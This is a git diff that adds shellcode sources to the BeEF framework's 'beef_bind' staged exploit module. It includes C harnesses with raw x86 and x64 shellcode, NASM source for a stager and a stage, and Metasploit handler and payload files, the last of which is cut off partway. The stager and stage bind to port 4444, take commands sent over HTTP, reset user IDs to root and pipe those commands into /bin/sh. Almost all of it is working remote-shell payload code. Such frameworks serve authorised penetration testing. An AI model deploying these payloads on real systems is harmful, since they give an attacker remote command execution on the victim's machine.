diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c new file mode 100755 index 000000000..58fee2877 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c @@ -0,0 +1,27 @@ +/** + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + + The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with: + #gcc -fno-stack-protector -z execstack -o socket64 socket64.c +**/ + +#include +#include +#include +#include + +int (*sc)(); + +char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6"; + +int main(int argc, char **argv) { + char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); + if (ptr == MAP_FAILED) {perror("mmap");exit(-1);} + memcpy(ptr, shellcode, sizeof(shellcode)); + sc = (int(*)())ptr; + (void)((void(*)())ptr)(); + printf("\n"); + return 0; +} diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm new file mode 100755 index 000000000..2489775d3 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm @@ -0,0 +1,285 @@ +BITS 64 + +SECTION .text +global _start +_start: + cld ;clear direction flag + xor rdx,rdx ;zero rdx + + push BYTE 0x02 + pop r14 + + ;create two pipes +createpipes: + push rdx ;allocate space on the stack + mov rdi, rsp ;point to the stack + push BYTE 0x16 + pop rax ;sys_pipe + syscall + dec r14 + test r14, r14 ;create 2 pipes + je endcreatepipes + jmp createpipes + +endcreatepipes: + ;sys_fork + push BYTE 0x39 + pop rax + syscall + cmp eax, 0x00 ;parent or child? + je child + + xor rdi, rdi ; zero rdi + mov edi, DWORD [rsp+0x8] ; close read end of one pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x4] ;close write end of the other pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + ;make non-blocking + mov edi, DWORD [rsp] ;fd + push BYTE 0x04 + pop rsi ;F_SETFL + xor rdx, rdx + mov rdx, 0x800 ;O_NONBLOCK + push BYTE 0x48 + pop rax ; sys_fcntl + syscall + + + ;allocate one page of memory + xor rdi,rdi ;system determines location + push 0x1000 ;allocated size + pop rsi + push BYTE 0x07 + pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC + push BYTE 0x22 + pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE + push rdi + push rdi + pop r9 ;offset + pop r8 ;fd + push BYTE 0x09 + pop rax + syscall + mov r14, rax ;save pointer allocated memory for later use + +doforever: + ;initialize socket + xor rdx, rdx ;zero rdx (proto =0) + push BYTE 0x01 + pop rsi ;SOCK_STREAM + push BYTE 0x02 + pop rdi ;AF_INET = 2 + push BYTE 0x29 + pop rax ;sys_socket + syscall + mov rbx, rax ; save socket filediscriptor + + ;reuse socket + push 0x01 ;true + mov r10, rsp ;ptr to optval + push BYTE 0x08 + pop r8 ;sizeof socklen_t + push BYTE 0x02 + pop rdx ;SO_REUSEADDR = 2 + push BYTE 0x01 + pop rsi ;SOL_SOCKET = 1 + mov rdi, rbx ;socketfd + push BYTE 0x36 ;sys_setsockopt + pop rax + syscall + + pop rax ;clean stack + + + ;bind socket to port + xor rax,rax + push BYTE 0x10 + pop rdx ;addrlen + push rax + push rax + mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 4444 + mov rsi, rsp ;ptr to sokaddr + mov rdi, rbx ;socketfd + push BYTE 0x31 + pop rax ;sys_bind + syscall + + pop rax ;clean stack + pop rax + + ;listen + xor rsi, rsi ;backlog ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x32 + pop rax ;sys_listen + syscall + + ;accept + xor rdx,rdx ;addrlen ptr = NULL + xor rsi,rsi ;sockaddr ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x2b + pop rax ;sys_accept + syscall + + mov r15, rax ;save client socket fd for later use + + ;close serversocket + mov rdi, rbx ;close server socket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + + mov rcx, 0x1000 ;pagesize +firstzeromemory: + ;zero out memory + dec rcx + mov rbx, r14 + add rbx, rcx + mov BYTE [rbx], 0x00 + jrcxz readfromsocket + jmp firstzeromemory + +readfromsocket: + xor rdx, rdx + + ;read into allocated memory + mov rdi, r15 ;client socketfd + mov rsi, r14 ;ptr to allocated memory + mov dx, 0x400 ;read 1024 bytes + push BYTE 0x00 + pop rax ;sys_read + syscall + + mov rcx, 0x400 ;search in 1024 bytes + mov rbx, r14 ;ptr to allocated memory +search: + cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd=" + je found ;cmd= found + inc rbx + dec rcx + jrcxz notfound ;cmd= not in recieved buffer + jmp search ;search some more +found: + xor rdi, rdi + mov rcx, rbx + add rcx, 0x03 ;skip "cmd" + mov rsi, rcx + mov edi, DWORD [rsp+0xC] ;write to pipe +sendcommand: + inc rsi ;first time skip "=", move to next byte + push BYTE 0x01 + pop rdx ;write one byte + push BYTE 0x01 + pop rax ;sys_write + syscall + cmp BYTE [rsi], 0x0a ;LF character? + jne sendcommand ;else continue write to pipe + + ;sleep one second + push BYTE 0x23 + pop rax ;sys_nanosleep + push DWORD 0x00 + push DWORD 0x01 ;one second + mov rdi, rsp ;ptr to argument array + xor rsi, rsi ;NULL + syscall + + pop rax ;clean stack + pop rax + +notfound: + call writehttpheaders + db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a + db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a + +writehttpheaders: + pop rsi ;source address saved by call + mov rdi, r14 ;ptr to allocated memory + add rdi, 0x400 ;skip 1024 bytes + mov rcx, 0x62 ;copy 98 bytes + rep movsb + + xor rdi, rdi ;zero rdi + mov edi, DWORD [rsp] ;read from pipe + mov rsi, r14 ;ptr to allocated memory + add rsi, 0x400 ;skip 1024 bytes + add rsi, 0x62 ;skip header + mov rdx, 0xb86 ;read max 2950 bytes + xor rax,rax ;sys_read + syscall + + + mov rdi, r15 ;clientsocket fd + mov rsi, r14 ;ptr to allocated memory + add rsi, 0x400 ;skip 1024 first bytes + mov rdx, 0xbe8 ;send max 3048 bytes + push BYTE 0x01 + pop rax ;sys_write + syscall + + mov rdi, r15 ;close clientsocket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + jmp doforever +child: + xor rdi, rdi + mov edi, DWORD [rsp+0xc] ;close output side of pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + xor rdi, rdi ;close stdin + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x08] ;dup input side to stdin + push BYTE 0x20 + pop rax ;sys_dup + syscall + + + mov edi, DWORD [rsp] ;close input side of other pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + xor rdi, rdi + inc rdi ;close stdout + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x4] ;dup output side to stdout + push BYTE 0x20 + pop rax ;sys_dup + syscall + + ;setresuid(0,0,0) + xor rdi, rdi + xor rsi, rsi + xor rdx, rdx + push BYTE 0x75 + pop rax ;sys_resuid + syscall + + push BYTE 0x3b + pop rax ;sys_execve + mov rdi, 0x0068732f6e69622f ;/bin/shNULL + push rdi ;push to stack + mov rdi, rsp ;ptr to stack + xor rsi, rsi ;NULL + xor rdx, rdx ;NULL + syscall diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm new file mode 100755 index 000000000..1a5d776bb --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm @@ -0,0 +1,106 @@ +BITS 64 + +SECTION .text +global _start +_start: + cld ;clear direction flag + xor rdx, rdx ;zero rdx (proto=0) + push BYTE 0x01 + pop rsi ;SOCK_STREAM + push BYTE 0x02 + pop rdi ;AF_INET = 2 + push BYTE 0x29 + pop rax ;sys_socket + syscall + mov rbx, rax ; save socket filediscriptor + + ;reuse socket + push 0x01 ;true + mov r10, rsp ;ptr to optval + push BYTE 0x08 + pop r8 ;sizeof socklen_t + push BYTE 0x02 + pop rdx ;SO_REUSEADDR = 2 + push BYTE 0x01 + pop rsi ;SOL_SOCKET = 1 + mov rdi, rbx ;socketfd + push BYTE 0x36 ;sys_setsockopt + pop rax + syscall + + xor rax,rax + push BYTE 0x10 + pop rdx ;addrlen + push rax + push rax + mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444 + mov rsi, rsp ;ptr to sokaddr + mov rdi, rbx ;socketfd + push BYTE 0x31 + pop rax ;sys_bind + syscall + + xor rsi, rsi ;backlog ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x32 + pop rax ;sys_listen + syscall + + ;accept + xor rdx,rdx ;addrlen ptr = NULL + xor rsi,rsi ;sockaddr ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x2B + pop rax ;sys_accept + syscall + + mov r15, rax ;save client socket fd for later use + + mov rdi, rbx ;close server socket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + ;allocate memory + + xor rdi,rdi ;system determines location + push 0x1000 ;allocated size + pop rsi + push BYTE 0x07 + pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC + push BYTE 0x22 + pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE + push rdi + push rdi + pop r9 ;offset + pop r8 ;fd + push BYTE 0x09 + pop rax + syscall + mov r14, rax ;save pointer allocated memory for later use + + ;read into allocated memory + mov rdi, r15 ;client socketfd + mov rsi, r14 ;ptr to allocated memory + mov dx, 0x1000 ;read one page of memory + push BYTE 0x00 + pop rax ;sys_read + syscall + + ;close clientsocketfd + mov rdi, r15 ;client socketfd + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov rsi, r14 ;ptr to allocated memory +search: + cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd=" + je short found ;cmd= found + inc rsi + jmp short search ;search some more +found: + push BYTE 0x04 ;skip "cmd=" + pop rax + add rsi, rax + jmp rsi ;jump to stage diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c new file mode 100644 index 000000000..f4e198fa3 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c @@ -0,0 +1,27 @@ +/** + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + + The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with: + #gcc -m32 -fno-stack-protector -z execstack -o socket socket.c +**/ + +#include +#include +#include +#include + +int (*sc)(); + +char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"; + +int main(int argc, char **argv) { + char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); + if (ptr == MAP_FAILED) {perror("mmap");exit(-1);} + memcpy(ptr, shellcode, sizeof(shellcode)); + sc = (int(*)())ptr; + (void)((void(*)())ptr)(); + printf("\n"); + return 0; +} diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm new file mode 100644 index 000000000..3ec5d952b --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm @@ -0,0 +1,290 @@ +; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +; Browser Exploitation Framework (BeEF) - http://beefproject.com +; See the file 'doc/COPYING' for copying permission + +BITS 32 + +SECTION .text + +global _start +_start: + cld ;clear direction flag + xor edx, edx ;zero edx + + push BYTE 0x02 + pop ecx + ;create two pipes +createpipes: + push edx ;allocate space on stack + push edx + mov ebx, esp ; ptr to argument array + push BYTE 0x2A ;sys_pipe + pop eax + int 0x80 ;syscall + dec ecx + jcxz endcreatepipes ;jmp when both pipes are created + jmp short createpipes ;create next pipe + +endcreatepipes: + ;create fork + xor ebx, ebx ;zero ebx + push BYTE 0x02 ;sys_fork + pop eax + int 0x80 ;syscall + cmp eax, 0x00 ;parent or child + je child + + mov ebx, [esp+0x8] ;close read end of one pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov ebx, [esp+0x4] ;close write end of the other pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + ; make non blocking + mov ebx, [esp] ;fd + push BYTE 0x04 ;F_SETFL + pop ecx + push 0x800 ;O_NONBLOCK + pop edx + push BYTE 0x37 ;sys_fcntl + pop eax + int 0x80 + + ;allocate one page of memory + push BYTE 0x00 ;offset = 0 + push 0xffffffff ;fd=-1 + push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE + push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC + push 0x1000 ;allocated size + push 0x00 ;system determines location + mov ebx, esp ;ptr to argument array + push BYTE 0x5a + pop eax + int 0x80 + mov edi, eax ;ptr to allocated memory + add esp, 0x18 + +doforever: + xor edx, edx + xor eax, eax + + ;initialize socket + push BYTE 0x01 + pop ebx ;SYS_SOCKET + push eax ;proto = 0 + inc eax + push eax ;SOCK_STREAM = 1 + inc eax + push eax ;AF_INET = 2 + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + mov esi, eax ; save socket filedescriptor + add esp, 0x0C + + ;reuse socket + push BYTE 0x0E + pop ebx ;SYS_SETSOCKOPT + push BYTE 0x04 ;sizeof socklen_t + push esp ;address of socklen_t + push BYTE 0x02 ;SO_REUSEADDR = 2 + push BYTE 0x01 ;SOL_SOCKET = 1 + push esi ;socket fd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x14 + + ;bind socket to port + push BYTE 0x02 + pop ebx ;SYS_BIND + push edx ;INADDR_ANY + push 0x5c110002 ;PORT 0x115c = 4444 + mov ecx, esp ;ptr to server struct + push BYTE 0x10 ; addrlen + push ecx + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x14 + + inc ebx + inc ebx ;SYS_LISTEN + push ebx ;backlog + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ; socketcall is syscall #102 + int 0x80 + add esp, 0x08 + + inc ebx ;SYS_ACCEPT + push edx ;socklen = 0 + push edx ;sockaddr ptr = NULL + push esi ;sockfd + mov ecx, esp ;ptr to argumet array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x0c + + xchg esi, eax ;serversocket in eax and clientsocket handler in esi + xchg eax, ebx ;serversocket in ebx + mov eax, 0x06 ;close serversocket + int 0x80 + + mov ecx, 0x1000 +firstzeromemory: + ;zero out memory + dec ecx + mov ebx, edi + add ebx, ecx + mov BYTE [ebx], 0x00 + jecxz readfromsocket + jmp firstzeromemory + +readfromsocket: + ;read from socket into memory + mov dx, 0x400 ;read 1024 bytes + mov ecx, edi ;ptr to allocated memory + mov ebx, esi ;clientsocket + push BYTE 0x03 + pop eax ;sys_read + int 0x80 + + push edi ;ptr to allocate memory + push esi ;clientsocket + mov ebx, edi ;ptr to allocated memory + mov ecx, 0x400 ;search in 1024 bytes +search: + cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd=" + je found ;cmd= found + inc ebx + dec ecx + jecxz notfound ;cmd= not in recieved buffer + jmp search ;search some more + +found: + mov ecx, ebx ;put ptr to memory where "cmd=" was found + add ecx, 0x03 ;skip "cmd" + mov ebx, [esp+0x14] ;write to pipe +sendcommand: + inc ecx ;first time skip "=", move to next byte + push BYTE 0x01 ;write one byte + pop edx + push BYTE 0x04 ;sys_write + pop eax + int 0x80 + cmp BYTE [ecx], 0x0a ;LF character? + jne sendcommand ;else continue write to pipe + + ;sleep one second + push 0x00 + push 0x01 ;one second + mov ebx, esp ;ptr to argument array + xor ecx, ecx ;NULL + mov eax, 0xA2 ;sys_nanosleep + int 0x80 + add esp, 0x08 ;clean up stack + +notfound: + call writehttpheaders + db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a ;HTTP/1.1 200 OK + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a ;Content-Type: text/html + db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a ;Access-Control-Allow-Origin: * + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a ;Content-Length: 3048 + +writehttpheaders: + pop esi ;source address saved by call + add edi, 0x400 ;ptr to memory skip 1024 bytes + mov ecx, 0x62 ;copy 98 bytes + rep movsb + + pop edi ;restore clientsocket + pop esi ;restore ptr to memory + + + mov ebx, [esp] ;read from pipe + mov ecx, esi ;ptr to memory + add ecx, 0x400 ;skip 1024 bytes + add ecx, 0x62 ;skip header + push 0xB86 ;read max 2950 bytes + pop edx + push BYTE 0x03 ;sys_read + pop eax + int 0x80 + + mov ebx, edi ;clientsocket + mov ecx, esi ;ptr to memory + add ecx, 0x400 ;skip 1024 first bytes + mov edx, 0xbe8 ;send max 3048 bytes + push BYTE 0x04 ;sys_write + pop eax + int 0x80 + + ;close clientsocket + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov edi, esi ;restore memory ptr into edi + jmp doforever + +child: + mov ebx, [esp+0xC] ;close output side of pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + xor ebx, ebx ;close stdin + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov ebx, [esp+0x8] ;dup input side to stdin + push BYTE 0x29 ;sys_dup + pop eax + int 0x80 + + mov ebx, [esp] ;close input side of other pipe + push BYTE 0x06 + pop eax + int 0x80 + + xor ebx, ebx + inc ebx ;close stdout + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov ebx, [esp+0x4] ;dup output side to stdout + push BYTE 0x29 ;sys_dup + pop eax + int 0x80 + + ;setresuid(0,0,0) + xor eax, eax + xor ebx, ebx + xor ecx, ecx + xor edx, edx + mov al, 0xa4 ;sys_setresuid16 + int 0x80 + + ;execve("/bin//sh", 0, 0) + xor eax, eax + push eax + push eax + push 0x68732f2f ;//sh + push 0x6e69622f ;/bin + mov ebx, esp + push BYTE 0x0b ;sys_execve + pop eax + int 0x80 diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm new file mode 100644 index 000000000..903a7f0b4 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm @@ -0,0 +1,111 @@ +; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +; Browser Exploitation Framework (BeEF) - http://beefproject.com +; See the file 'doc/COPYING' for copying permission + +BITS 32 + +SECTION .text + +global _start +_start: + cld ;clear direction flag + xor eax, eax ;zero eax + xor edx, edx ;zero edx + + ;initialize socket + push BYTE 0x01 + pop ebx ;SYS_SOCKET + push eax ; proto = 0 + inc eax + push eax ;SOCK_STREAM = 1 + inc eax + push eax ;AF_INET = 2 + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + mov esi, eax ;save socket filediscriptor + + push BYTE 0x0E + pop ebx ;SYS_SETSOCKOPT + push BYTE 0x04 ;sizeof socklen_t + push esp ; address of socklen_t + push BYTE 0x02 ;SO_REUSEADDR = 2 + push BYTE 0x01 ;SOL_SOCKET = 1 + push esi ;socket fd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ; socketcall is syscall #102 + int 0x80 + + ;bind socket to port + push BYTE 0x02 + pop ebx ;SYS_BIND + push edx ;INADDR_ANY + push 0x5c110002 ;PORT 0x115C = 4444 + mov ecx, esp ;server struct + push BYTE 0x10 ;addrlen + push ecx + push esi ;socketfd + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + inc ebx + inc ebx ;SYS_LISTEN + push ebx ;backlog + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + inc ebx ;SYS_ACCEPT + push edx ;socklen = 0 + push edx ;sockaddr ptr = NULL + push esi ;socketfd + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + xchg esi, eax ;serversocket in eax and client socket handler into esi + xchg eax, ebx ;serversocket in ebx + mov eax, 0x6 ;close serversocket + int 0x80 + + push BYTE 0x00 ;offset =0 + push 0xFFFFFFFF ;fd = -1 + push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE + push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC + push 0x1000 ;allocated size + push BYTE 0x00 ;system determines location + mov ebx, esp ;ptr tot argument array + push BYTE 0x5a + pop eax ;MMAP call + int 0x80 + mov edi, eax ;ptr to allocated memory + + ; read from socket into memory + mov dx, 0x1000 ;max bytes to read + mov ecx, edi ;pointer to memory + mov ebx, esi ;clientsocket + push BYTE 0x03 + pop eax + int 0x80 + + push BYTE 0x06 + pop eax ;close clientsocket + int 0x80 + +search: + cmp DWORD [edi], 0x3d646d63 ;compare with "cmd=" + je short found ;jump if found + inc edi ;look some further + jmp short search +found: + push BYTE 0x04 + pop eax + add edi, eax ;skip "cmd=" + jmp edi ;jump to the staged shellcode diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb new file mode 100644 index 000000000..29be93ecd --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb @@ -0,0 +1,73 @@ +## +# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$ +## + +module Msf +module Handler + +### +# +# This module implements the Bind TCP handler placeholder only. +# +### +module BeEFBind + + include Msf::Handler + + # + # Returns the handler specific string representation + # + def self.handler_type + return "beef_bind" + end + + # + # Returns the connection oriented general handler type + # + def self.general_handler_type + "bind" + end + + # + # Initializes a bind handler and adds the options common to all bind + # payloads, such as local port. + # + def initialize(info = {}) + super + register_options( + [ + Opt::LPORT(4444), + #OptAddress.new('RHOST', [false, 'The target address', '']), + ], Msf::Handler::BeEFBind) + end + + # + # Placeholder only + # + def cleanup_handler + end + + # + # Placeholder only + # + def add_handler(opts={}) + # Start a new handler + start_handler + end + + # + # Placeholder only + # + def start_handler + end + + # + # Placeholder only + # + def stop_handler + end + +end + +end +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb new file mode 100644 index 000000000..99079e92f --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb @@ -0,0 +1,85 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Bart Leppens' ], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 165, 'n' ] + }, + 'Payload' => + "\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" + + "\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" + + "\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" + + "\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" + + "\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" + + "\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" + + "\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" + + "\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" + + "\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" + + "\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" + + "\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" + + "\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" + + "\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" + + "\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" + + 